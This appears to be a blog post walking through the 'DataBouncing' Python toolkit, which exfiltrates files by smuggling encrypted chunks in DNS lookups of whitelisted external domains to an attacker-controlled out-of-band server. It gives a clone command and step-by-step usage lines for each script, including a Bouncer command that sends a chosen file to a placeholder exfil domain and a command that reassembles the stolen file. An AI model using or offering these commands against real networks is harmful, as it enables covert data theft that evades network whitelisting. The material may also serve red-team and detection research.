Bouncing with Nick Dunn
When we where conceptualizing data bouncing, Nick rolled his sleeves top and put together the first set of reliable python tools to get data out and rebuilt via databouncing, this is achieved over four scripts, let's take a look https://github.com/N1ckDunn/DataBouncing/tree/main
Recruiter.py
V0.2 Working PoC to check a list of hosts and their responses via the DNS bouncer.Dentist.py
V1.1 Currently working and tested. Extracts the list of usable hosts from the DNS output.Bouncer.py
V0.2 Working PoC for binary file transfer/exfiltration (see below). Further functionality to come.TheTherapist.py
V0.2 Working PoC for reassembly of exfiltrated file (see below). Further functionality to come.
git clone https://github.com/N1ckDunn/DataBouncing.git
Using Recruiter.py
You provide a file containing potential targets to be assessed, and Recruiter will assess the viability of using them for data bouncing. The targets will be external domains that are whitelisted by the environment that you are planning to DataBounce from. After running Recruiter, he JSON output from interactsh ca be passed to Dentist to extract usable hostnames.
Usage:python3 recruiter.py -o YOUR_OOB_DOMAIN_HERE -f domains.txt -v
Using Dentist.py
Extract a list of usable hosts from JSON data. It requires the exported JSON output of the DNS server, from running Recruiter against your list of hosts. It will extract the usable hostname from the "full-id" param, clipping the unwanted string from the end, ready for usage with Bouncer:"unique-id":"ckji0gb5hom1mdsb8p7gmphu9ibe1sxoq","full-id":"
www.host.apa.org.ckji0gb5hom1mdsb8p7gmphu9ibe1sxoq
","
Usage:python3 dentist.py json_datafile
eg:python3 dentist.py input.json
Using Bouncer.py
Provide an exfil domain (a DNS server under your control), and a file that you wish to exfiltrate. The Bouncer will randomly choose a domain name to query, encrypt the file and send it in chunks to be prepended as part of the payload within the header, to be subsequently collected by the DNS server under your control.
You'll need to specify a unique ID that will be used to reassemble the file after smuggling.
Example cmd line input:python3 bouncer.py -e YOUR_OOB_DOMAIN_HERE -f your_filename.jpeg -u 5555 -v
Note that the exile server named by the -e parameter above should match the server name copied from the interactsh web interface, as used as named on the cmd line for interactsh client. It should *not* match the full hostname in the interactsh client terminal output.
Using TheTherapist.py
When provided with JSON input from the DNS server, therapist extracts and reassembles the individual encrypted chunks, decrypts them and writes the output to a filename of your choosing.
Use the unique ID that you used during exfiltration.
Example cmd line input:python3 thetherapist.py -i your_output.json -o output_filename.jpeg -u 5555 -v